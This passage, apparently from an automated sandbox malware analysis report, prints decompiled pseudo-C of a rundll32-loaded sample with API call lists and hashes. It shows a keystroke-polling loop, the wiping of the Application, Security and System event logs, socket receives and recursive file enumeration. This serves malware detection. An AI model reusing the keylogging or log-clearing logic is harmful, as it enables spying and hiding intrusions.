                                                                                              								}
                                                                                              							}
                                                                                              							E0425B2E0(_t25, _t27, _t30, _t32);
                                                                                              						}
                                                                                              						_t32 = _t32 + 0x14;
                                                                                              					} while (_t32 < 0x3ac);
                                                                                              					_t33 = 0;
                                                                                              					do {
                                                                                              						_t12 = _t33 + 0x42a4b18; // 0x8
                                                                                              						if((GetAsyncKeyState( *_t12 & 0x0000ffff) & 0x00000001) != 0) {
                                                                                              							_t15 = _t33 + 0x42a4b1c; // 0x429e508
                                                                                              							E0425B2E0(_t25,  *_t15, _t30, _t33);
                                                                                              						}
                                                                                              						_t33 = _t33 + 8;
                                                                                              					} while (_t33 < 0x1c0);
                                                                                              				}
                                                                                              			}








                                                                                              0x0425b847
                                                                                              0x0425b84a
                                                                                              0x0425b850
                                                                                              0x0425b852
                                                                                              0x0425b858
                                                                                              0x0425b85a
                                                                                              0x0425b860
                                                                                              0x0425b860
                                                                                              0x0425b86c
                                                                                              0x0425b87b
                                                                                              0x0425b88c
                                                                                              0x0425b8a4
                                                                                              0x0425b8ae
                                                                                              0x0425b8ae
                                                                                              0x0425b8a6
                                                                                              0x0425b8a6
                                                                                              0x0425b8a6
                                                                                              0x0425b8a6
                                                                                              0x0425b88e
                                                                                              0x0425b890
                                                                                              0x0425b89a
                                                                                              0x0425b89a
                                                                                              0x0425b892
                                                                                              0x0425b892
                                                                                              0x0425b892
                                                                                              0x0425b892
                                                                                              0x0425b890
                                                                                              0x0425b8b4
                                                                                              0x0425b8b4
                                                                                              0x0425b8b9
                                                                                              0x0425b8bc
                                                                                              0x0425b8c4
                                                                                              0x0425b8c6
                                                                                              0x0425b8c6
                                                                                              0x0425b8d2
                                                                                              0x0425b8d4
                                                                                              0x0425b8da
                                                                                              0x0425b8da
                                                                                              0x0425b8df
                                                                                              0x0425b8e2
                                                                                              0x0425b8ea

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000005), ref: 0425B852
                                                                                              • GetAsyncKeyState.USER32(00000030), ref: 0425B868
                                                                                              • GetKeyState.USER32(00000010), ref: 0425B870
                                                                                              • GetKeyState.USER32(00000014), ref: 0425B87E
                                                                                              • GetAsyncKeyState.USER32(00000008), ref: 0425B8CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State$Async$Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 1722988271-0
                                                                                              • Opcode ID: 1871ab2da7d341e10d28eb9fa3da3245aa05979b70f3088bd0ac934d5881dc31
                                                                                              • Instruction ID: f7ca779377b70a90f79794aa2a991489e2802aff5bc3ead24ad7b15e777c8fa3
                                                                                              • Opcode Fuzzy Hash: 1871ab2da7d341e10d28eb9fa3da3245aa05979b70f3088bd0ac934d5881dc31
                                                                                              • Instruction Fuzzy Hash: 5811E532B6025497D6247768AC0DFB2B7A9EF41F44B0A2418DCD6572E0DBB4BC12D7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 56%
                                                                                              			E042557F0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				void* _v15;
                                                                                              				intOrPtr _v19;
                                                                                              				char _v20;
                                                                                              				struct _WIN32_FIND_DATAW _v612;
                                                                                              				long _v616;
                                                                                              				signed int _t20;
                                                                                              				void* _t23;
                                                                                              				WCHAR* _t24;
                                                                                              				void* _t27;
                                                                                              				void* _t34;
                                                                                              				void* _t35;
                                                                                              				void* _t37;
                                                                                              				void* _t40;
                                                                                              				WCHAR* _t45;
                                                                                              				long _t47;
                                                                                              				long _t48;
                                                                                              				signed int _t49;
                                                                                              
                                                                                              				_t20 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t20 ^ _t49;
                                                                                              				_t37 = __ecx;
                                                                                              				_t47 =  *(__ecx + 0x14);
                                                                                              				_t23 = _t47 - 2;
                                                                                              				if(_t23 == 0) {
                                                                                              					_t47 = 1;
                                                                                              				} else {
                                                                                              					_t34 = _t23 - 2;
                                                                                              					if(_t34 == 0) {
                                                                                              						_t47 = 3;
                                                                                              					} else {
                                                                                              						_t35 = _t34 - 2;
                                                                                              						if(_t35 == 0) {
                                                                                              							_t47 = _t35 + 5;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t45 = _t37 + 0x18;
                                                                                              				if( *((intOrPtr*)(_t37 + 0x2c)) < 8) {
                                                                                              					_t24 = _t45;
                                                                                              				} else {
                                                                                              					_t24 =  *_t45;
                                                                                              				}
                                                                                              				_t40 = FindFirstFileW(_t24,  &_v612);
                                                                                              				_v12 = 0;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				asm("movq [ebp-0x10], xmm0");
                                                                                              				_v20 = 0x71;
                                                                                              				if(_t40 == 0xffffffff) {
                                                                                              					L16:
                                                                                              					_t48 = 2;
                                                                                              					asm("movq [ebp-0xf], xmm0");
                                                                                              				} else {
                                                                                              					if(_t47 != 1) {
                                                                                              						if(_t47 == 3) {
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						if(_t47 != 5) {
                                                                                              							_t48 = _v616;
                                                                                              						} else {
                                                                                              							_v15 = 0xffffffff;
                                                                                              							_t48 = 3;
                                                                                              						}
                                                                                              						L17:
                                                                                              						FindClose(_t40);
                                                                                              						if(_t45[0xa] >= 8) {
                                                                                              							_t45 =  *_t45;
                                                                                              						}
                                                                                              						_t27 = CreateFileW(_t45, 0x40000000, 2, 0, _t48, 0x80, 0);
                                                                                              						if(_t27 != 0xffffffff) {
                                                                                              							CloseHandle(_t27);
                                                                                              						} else {
                                                                                              							_v15 = _t27;
                                                                                              						}
                                                                                              						_push(_t40);
                                                                                              						_push(0x3f);
                                                                                              						_push(9);
                                                                                              						E04251C60( *((intOrPtr*)(_t37 + 4)));
                                                                                              						return E04275AFE(_v8 ^ _t49,  &_v20);
                                                                                              					}
                                                                                              					_t48 = 3;
                                                                                              					_v19 = _v612.nFileSizeHigh;
                                                                                              					_v15 = _v612.nFileSizeLow;
                                                                                              				}
                                                                                              			}






















                                                                                              0x042557f9
                                                                                              0x04255800
                                                                                              0x04255804
                                                                                              0x04255808
                                                                                              0x0425580d
                                                                                              0x04255810
                                                                                              0x04255828
                                                                                              0x04255812
                                                                                              0x04255812
                                                                                              0x04255815
                                                                                              0x04255821
                                                                                              0x04255817
                                                                                              0x04255817
                                                                                              0x0425581a
                                                                                              0x0425581c
                                                                                              0x0425581c
                                                                                              0x0425581a
                                                                                              0x04255815
                                                                                              0x04255831
                                                                                              0x04255834
                                                                                              0x0425583a
                                                                                              0x04255836
                                                                                              0x04255836
                                                                                              0x04255836
                                                                                              0x0425584a
                                                                                              0x0425584c
                                                                                              0x04255850
                                                                                              0x04255853
                                                                                              0x04255858
                                                                                              0x0425585f
                                                                                              0x0425589f
                                                                                              0x0425589f
                                                                                              0x042558a4
                                                                                              0x04255861
                                                                                              0x04255864
                                                                                              0x04255882
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04255887
                                                                                              0x04255897
                                                                                              0x04255889
                                                                                              0x04255889
                                                                                              0x04255890
                                                                                              0x04255890
                                                                                              0x042558a9
                                                                                              0x042558aa
                                                                                              0x042558b4
                                                                                              0x042558b6
                                                                                              0x042558b6
                                                                                              0x042558ca
                                                                                              0x042558d3
                                                                                              0x042558db
                                                                                              0x042558d5
                                                                                              0x042558d5
                                                                                              0x042558d5
                                                                                              0x042558e1
                                                                                              0x042558e8
                                                                                              0x042558ea
                                                                                              0x042558ed
                                                                                              0x04255902
                                                                                              0x04255902
                                                                                              0x0425586c
                                                                                              0x04255871
                                                                                              0x0425587a
                                                                                              0x0425587a

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04255844
                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 042558AA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 042558CA
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 042558DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFileFind$CreateFirstHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3283578348-0
                                                                                              • Opcode ID: 0484a7ea7a5fd3d4bb2034a970fa571d584ef38fdbdd0f6272412e10210d932a
                                                                                              • Instruction ID: d5be213f2910c6483464ba9196ef8ab4991811f9609ee27a0117dc3db053d405
                                                                                              • Opcode Fuzzy Hash: 0484a7ea7a5fd3d4bb2034a970fa571d584ef38fdbdd0f6272412e10210d932a
                                                                                              • Instruction Fuzzy Hash: 3631C031F24215BBDB249E68DC4C7ADBB74EB05320F150AAAE819A7294D770BDC1CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 43%
                                                                                              			E0426F540(intOrPtr* __ecx) {
                                                                                              				long _t17;
                                                                                              				intOrPtr* _t23;
                                                                                              				long _t28;
                                                                                              				intOrPtr* _t29;
                                                                                              
                                                                                              				_t29 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x184)) != 0) {
                                                                                              					L12:
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					_t23 = __imp__#16;
                                                                                              					do {
                                                                                              						_t17 =  *_t23( *((intOrPtr*)(_t29 + 0x1c)),  *((intOrPtr*)(_t29 + 0x5c)),  *((intOrPtr*)(_t29 + 0x2c)), 0);
                                                                                              						_t28 = _t17;
                                                                                              						if(_t28 <= 0) {
                                                                                              							if(_t28 == 0xffffffff) {
                                                                                              								__imp__#111();
                                                                                              								if(_t17 != 0x2733) {
                                                                                              									goto L5;
                                                                                              								} else {
                                                                                              									goto L12;
                                                                                              								}
                                                                                              							} else {
                                                                                              								if(_t28 == 0) {
                                                                                              									 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                                                              									 *((intOrPtr*)(_t29 + 0x10)) = 5;
                                                                                              									 *(_t29 + 0x14) = 0;
                                                                                              									 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                                                              									return 0;
                                                                                              								} else {
                                                                                              									goto L8;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							SetLastError(0);
                                                                                              							_push(_t28);
                                                                                              							_push( *((intOrPtr*)(_t29 + 0x5c)));
                                                                                              							if( *((intOrPtr*)( *_t29 + 0x8c))() != 2) {
                                                                                              								goto L8;
                                                                                              							} else {
                                                                                              								_t17 =  ==  ? 0x4c7 : GetLastError();
                                                                                              								L5:
                                                                                              								 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                                                              								 *((intOrPtr*)(_t29 + 0x10)) = 4;
                                                                                              								 *(_t29 + 0x14) = _t17;
                                                                                              								 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                                                              								return 0;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L13;
                                                                                              						L8:
                                                                                              					} while ( *((intOrPtr*)(_t29 + 0x184)) == 0);
                                                                                              					return 1;
                                                                                              				}
                                                                                              				L13:
                                                                                              			}







                                                                                              0x0426f542
                                                                                              0x0426f54c
                                                                                              0x0426f600
                                                                                              0x0426f606
                                                                                              0x0426f552
                                                                                              0x0426f552
                                                                                              0x0426f558
                                                                                              0x0426f563
                                                                                              0x0426f565
                                                                                              0x0426f569
                                                                                              0x0426f5b7
                                                                                              0x0426f5f1
                                                                                              0x0426f5fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426f5b9
                                                                                              0x0426f5bb
                                                                                              0x0426f5d0
                                                                                              0x0426f5d9
                                                                                              0x0426f5e0
                                                                                              0x0426f5e7
                                                                                              0x0426f5f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426f5bb
                                                                                              0x0426f56b
                                                                                              0x0426f56d
                                                                                              0x0426f577
                                                                                              0x0426f578
                                                                                              0x0426f584
                                                                                              0x00000000
                                                                                              0x0426f586
                                                                                              0x0426f593
                                                                                              0x0426f596
                                                                                              0x0426f596
                                                                                              0x0426f59d
                                                                                              0x0426f5a4
                                                                                              0x0426f5aa
                                                                                              0x0426f5b3
                                                                                              0x0426f5b3
                                                                                              0x0426f584
                                                                                              0x00000000
                                                                                              0x0426f5bd
                                                                                              0x0426f5bd
                                                                                              0x0426f5ce
                                                                                              0x0426f5ce
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 0426F563
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426F56D
                                                                                              • GetLastError.KERNEL32 ref: 0426F586
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$recv
                                                                                              • String ID:
                                                                                              • API String ID: 316788870-0
                                                                                              • Opcode ID: 9a415a37e4a634fc2230b24d488e8d7c6f87be362abc4f8e6ce208d844e71de8
                                                                                              • Instruction ID: 8086989764f53f0c8fdbf546fc37749fb811919f9a38815161322c0adb6dacf2
                                                                                              • Opcode Fuzzy Hash: 9a415a37e4a634fc2230b24d488e8d7c6f87be362abc4f8e6ce208d844e71de8
                                                                                              • Instruction Fuzzy Hash: 5111B1B23117009FEB308F6CF948746B7E2EB84365F21492EE146C2280CBB9EC859B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0425A010(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char* _v12;
                                                                                              				char* _v16;
                                                                                              				char* _v20;
                                                                                              				signed int _t9;
                                                                                              				void* _t20;
                                                                                              				signed int _t22;
                                                                                              				signed int _t23;
                                                                                              
                                                                                              				_t9 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t9 ^ _t23;
                                                                                              				_v20 = "Application";
                                                                                              				_t22 = 0;
                                                                                              				_v16 = "Security";
                                                                                              				_v12 = "System";
                                                                                              				do {
                                                                                              					_t20 = OpenEventLogA(0,  *(_t23 + _t22 * 4 - 0x10));
                                                                                              					if(_t20 != 0) {
                                                                                              						ClearEventLogW(_t20, 0);
                                                                                              						CloseEventLog(_t20);
                                                                                              					}
                                                                                              					_t22 = _t22 + 1;
                                                                                              				} while (_t22 < 3);
                                                                                              				return E04275AFE(_v8 ^ _t23);
                                                                                              			}











                                                                                              0x0425a016
                                                                                              0x0425a01d
                                                                                              0x0425a029
                                                                                              0x0425a030
                                                                                              0x0425a032
                                                                                              0x0425a039
                                                                                              0x0425a040
                                                                                              0x0425a04c
                                                                                              0x0425a050
                                                                                              0x0425a055
                                                                                              0x0425a058
                                                                                              0x0425a058
                                                                                              0x0425a05e
                                                                                              0x0425a05f
                                                                                              0x0425a074

                                                                                              APIs
                                                                                              • OpenEventLogA.ADVAPI32(00000000,0429E100), ref: 0425A046
                                                                                              • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0425A055
                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 0425A058
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Event$ClearCloseOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1391105993-0
                                                                                              • Opcode ID: 6899876ca249efccf22ecbec651e0b7511a39aef64996482b74147fdaea3ae2c
                                                                                              • Instruction ID: fa951c9d8cca7d48be9b62904fa9aee6d7d8a48e312fd84b0bf5e3a52a0fa1bb
                                                                                              • Opcode Fuzzy Hash: 6899876ca249efccf22ecbec651e0b7511a39aef64996482b74147fdaea3ae2c
                                                                                              • Instruction Fuzzy Hash: A8F0F632B10208BBDB11EF5CBC8D76FFBB8EB49701F01055DE90463141CA74AC058B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0427F37F(int _a4) {
                                                                                              				void* _t14;
                                                                                              				void* _t16;
                                                                                              
                                                                                              				if(E04289427(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                              					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                              				}
                                                                                              				E0427F404(_t14, _t16, _a4);
                                                                                              				ExitProcess(_a4);
                                                                                              			}





                                                                                              0x0427f38b
                                                                                              0x0427f3a7
                                                                                              0x0427f3a7
                                                                                              0x0427f3b0
                                                                                              0x0427f3b9

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,0427F355,?,042A1730,0000000C,0427F488,00000000,00000000,00000001,0427625B,042A15D0,0000000C,04276104,?), ref: 0427F3A0
                                                                                              • TerminateProcess.KERNEL32(00000000,?,0427F355,?,042A1730,0000000C,0427F488,00000000,00000000,00000001,0427625B,042A15D0,0000000C,04276104,?), ref: 0427F3A7
                                                                                              • ExitProcess.KERNEL32 ref: 0427F3B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: ee9df999a84554719b348cf470ccb2a9244dea39fcdfa56068de3323d857e757
                                                                                              • Instruction ID: e92d57f36220f47fbe689d548630de93406a736d9167ed3d0e4e6cce5bd12d26
                                                                                              • Opcode Fuzzy Hash: ee9df999a84554719b348cf470ccb2a9244dea39fcdfa56068de3323d857e757
                                                                                              • Instruction Fuzzy Hash: E6E04631628249AFCF117F59EA0CA483B69FB40241F010014F8048A121CF39FC93CA80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E04289B29(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr* _v32;
                                                                                              				CHAR* _v36;
                                                                                              				signed int _v48;
                                                                                              				char _v286;
                                                                                              				signed int _v287;
                                                                                              				struct _WIN32_FIND_DATAA _v332;
                                                                                              				intOrPtr* _v336;
                                                                                              				signed int _v340;
                                                                                              				signed int _v344;
                                                                                              				intOrPtr _v372;
                                                                                              				signed int _t35;
                                                                                              				signed int _t40;
                                                                                              				signed int _t43;
                                                                                              				intOrPtr _t45;
                                                                                              				signed char _t47;
                                                                                              				intOrPtr* _t55;
                                                                                              				union _FINDEX_INFO_LEVELS _t57;
                                                                                              				signed int _t62;
                                                                                              				signed int _t65;
                                                                                              				void* _t72;
                                                                                              				void* _t74;
                                                                                              				signed int _t75;
                                                                                              				void* _t78;
                                                                                              				CHAR* _t79;
                                                                                              				intOrPtr* _t83;
                                                                                              				intOrPtr _t85;
                                                                                              				void* _t87;
                                                                                              				intOrPtr* _t88;
                                                                                              				signed int _t92;
                                                                                              				signed int _t96;
                                                                                              				void* _t101;
                                                                                              				intOrPtr _t102;
                                                                                              				signed int _t105;
                                                                                              				union _FINDEX_INFO_LEVELS _t106;
                                                                                              				void* _t111;
                                                                                              				intOrPtr _t112;
                                                                                              				void* _t113;
                                                                                              				signed int _t118;
                                                                                              				void* _t119;
                                                                                              				signed int _t120;
                                                                                              				void* _t121;
                                                                                              				void* _t122;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t83 = _a4;
                                                                                              				_t2 = _t83 + 1; // 0x1
                                                                                              				_t101 = _t2;
                                                                                              				do {
                                                                                              					_t35 =  *_t83;
                                                                                              					_t83 = _t83 + 1;
                                                                                              				} while (_t35 != 0);
                                                                                              				_push(__edi);
                                                                                              				_t105 = _a12;
                                                                                              				_t85 = _t83 - _t101 + 1;
                                                                                              				_v8 = _t85;
                                                                                              				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                                                              					_push(__ebx);
                                                                                              					_push(__esi);
                                                                                              					_t5 = _t105 + 1; // 0x1
                                                                                              					_t78 = _t5 + _t85;
                                                                                              					_t111 = E04288535(_t85, _t78, 1);
                                                                                              					_pop(_t87);
                                                                                              					__eflags = _t105;
                                                                                              					if(_t105 == 0) {
                                                                                              						L6:
                                                                                              						_push(_v8);
                                                                                              						_t78 = _t78 - _t105;
                                                                                              						_t40 = E0428CC4B(_t87, _t111 + _t105, _t78, _a4);
                                                                                              						_t120 = _t119 + 0x10;
                                                                                              						__eflags = _t40;
                                                                                              						if(__eflags != 0) {
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							_t72 = E04289D68(_a16, __eflags, _t111);
                                                                                              							E042884AD(0);
                                                                                              							_t74 = _t72;
                                                                                              							goto L8;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t105);
                                                                                              						_t75 = E0428CC4B(_t87, _t111, _t78, _a8);
                                                                                              						_t120 = _t119 + 0x10;
                                                                                              						__eflags = _t75;
                                                                                              						if(_t75 != 0) {
                                                                                              							L9:
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							E0427EF13();
                                                                                              							asm("int3");
                                                                                              							_t118 = _t120;
                                                                                              							_t121 = _t120 - 0x150;
                                                                                              							_t43 =  *0x42a4008; // 0xd33db39d
                                                                                              							_v48 = _t43 ^ _t118;
                                                                                              							_t88 = _v32;
                                                                                              							_push(_t78);
                                                                                              							_t79 = _v36;
                                                                                              							_push(_t111);
                                                                                              							_t112 = _v332.cAlternateFileName;
                                                                                              							_push(_t105);
                                                                                              							_v372 = _t112;
                                                                                              							while(1) {
                                                                                              								__eflags = _t88 - _t79;
                                                                                              								if(_t88 == _t79) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t45 =  *_t88;
                                                                                              								__eflags = _t45 - 0x2f;
                                                                                              								if(_t45 != 0x2f) {
                                                                                              									__eflags = _t45 - 0x5c;
                                                                                              									if(_t45 != 0x5c) {
                                                                                              										__eflags = _t45 - 0x3a;
                                                                                              										if(_t45 != 0x3a) {
                                                                                              											_t88 = E0428CCA0(_t79, _t88);
                                                                                              											continue;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              								break;
                                                                                              							}
                                                                                              							_t102 =  *_t88;
                                                                                              							__eflags = _t102 - 0x3a;
                                                                                              							if(_t102 != 0x3a) {
                                                                                              								L20:
                                                                                              								_t106 = 0;
                                                                                              								__eflags = _t102 - 0x2f;
                                                                                              								if(_t102 == 0x2f) {
                                                                                              									L24:
                                                                                              									_t47 = 1;
                                                                                              									__eflags = 1;
                                                                                              								} else {
                                                                                              									__eflags = _t102 - 0x5c;
                                                                                              									if(_t102 == 0x5c) {
                                                                                              										goto L24;
                                                                                              									} else {
                                                                                              										__eflags = _t102 - 0x3a;
                                                                                              										if(_t102 == 0x3a) {
                                                                                              											goto L24;
                                                                                              										} else {
                                                                                              											_t47 = 0;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              								_t90 = _t88 - _t79 + 1;
                                                                                              								asm("sbb eax, eax");
                                                                                              								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                                                              								E0427DEA0(_t106,  &_v332, _t106, 0x140);
                                                                                              								_t122 = _t121 + 0xc;
                                                                                              								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                                                              								_t55 = _v336;
                                                                                              								__eflags = _t113 - 0xffffffff;
                                                                                              								if(_t113 != 0xffffffff) {
                                                                                              									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                                              									__eflags = _t92;
                                                                                              									_t93 = _t92 >> 2;
                                                                                              									_v344 = _t92 >> 2;
                                                                                              									do {
                                                                                              										__eflags = _v332.cFileName - 0x2e;
                                                                                              										if(_v332.cFileName != 0x2e) {
                                                                                              											L37:
                                                                                              											_push(_t55);
                                                                                              											_t57 = E04289B29(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                                                                                              											_t122 = _t122 + 0x10;
                                                                                              											__eflags = _t57;
                                                                                              											if(_t57 != 0) {
                                                                                              												goto L27;
                                                                                              											} else {
                                                                                              												goto L38;
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t93 = _v287;
                                                                                              											__eflags = _t93;
                                                                                              											if(_t93 == 0) {
                                                                                              												goto L38;
                                                                                              											} else {
                                                                                              												__eflags = _t93 - 0x2e;
                                                                                              												if(_t93 != 0x2e) {
                                                                                              													goto L37;
                                                                                              												} else {
                                                                                              													__eflags = _v286;
                                                                                              													if(_v286 == 0) {
                                                                                              														goto L38;
                                                                                              													} else {
                                                                                              														goto L37;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              										goto L31;
                                                                                              										L38:
                                                                                              										_t62 = FindNextFileA(_t113,  &_v332);
                                                                                              										__eflags = _t62;
                                                                                              										_t55 = _v336;
                                                                                              									} while (_t62 != 0);
                                                                                              									_t103 =  *_t55;
                                                                                              									_t96 = _v344;
                                                                                              									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                                              									__eflags = _t96 - _t65;
                                                                                              									if(_t96 != _t65) {
                                                                                              										E0428C800(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E04289981);
                                                                                              									}
                                                                                              								} else {
                                                                                              									_push(_t55);
                                                                                              									_t57 = E04289B29(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                                                                                              									L27:
                                                                                              									_t106 = _t57;
                                                                                              								}
                                                                                              								__eflags = _t113 - 0xffffffff;
                                                                                              								if(_t113 != 0xffffffff) {
                                                                                              									FindClose(_t113);
                                                                                              								}
                                                                                              							} else {
                                                                                              								__eflags = _t88 -  &(_t79[1]);
                                                                                              								if(_t88 ==  &(_t79[1])) {
                                                                                              									goto L20;
                                                                                              								} else {
                                                                                              									_push(_t112);
                                                                                              									E04289B29(_t79, _t88, 0, _t112, _t79, 0, 0);
                                                                                              								}
                                                                                              							}
                                                                                              							L31:
                                                                                              							__eflags = _v12 ^ _t118;
                                                                                              							return E04275AFE(_v12 ^ _t118);
                                                                                              						} else {
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t74 = 0xc;
                                                                                              					L8:
                                                                                              					return _t74;
                                                                                              				}
                                                                                              			}















































                                                                                              0x04289b2e
                                                                                              0x04289b2f
                                                                                              0x04289b32
                                                                                              0x04289b32
                                                                                              0x04289b35
                                                                                              0x04289b35
                                                                                              0x04289b37
                                                                                              0x04289b38
                                                                                              0x04289b41
                                                                                              0x04289b42
                                                                                              0x04289b45
                                                                                              0x04289b48
                                                                                              0x04289b4d
                                                                                              0x04289b54
                                                                                              0x04289b55
                                                                                              0x04289b56
                                                                                              0x04289b59
                                                                                              0x04289b63
                                                                                              0x04289b66
                                                                                              0x04289b67
                                                                                              0x04289b69
                                                                                              0x04289b7d
                                                                                              0x04289b7d
                                                                                              0x04289b80
                                                                                              0x04289b8a
                                                                                              0x04289b8f
                                                                                              0x04289b92
                                                                                              0x04289b94
                                                                                              0x00000000
                                                                                              0x04289b96
                                                                                              0x04289b9a
                                                                                              0x04289ba3
                                                                                              0x04289ba9
                                                                                              0x00000000
                                                                                              0x04289bac
                                                                                              0x04289b6b
                                                                                              0x04289b6b
                                                                                              0x04289b71
                                                                                              0x04289b76
                                                                                              0x04289b79
                                                                                              0x04289b7b
                                                                                              0x04289bb2
                                                                                              0x04289bb4
                                                                                              0x04289bb5
                                                                                              0x04289bb6
                                                                                              0x04289bb7
                                                                                              0x04289bb8
                                                                                              0x04289bb9
                                                                                              0x04289bbe
                                                                                              0x04289bc2
                                                                                              0x04289bc4
                                                                                              0x04289bca
                                                                                              0x04289bd1
                                                                                              0x04289bd4
                                                                                              0x04289bd7
                                                                                              0x04289bd8
                                                                                              0x04289bdb
                                                                                              0x04289bdc
                                                                                              0x04289bdf
                                                                                              0x04289be0
                                                                                              0x04289c01
                                                                                              0x04289c01
                                                                                              0x04289c03
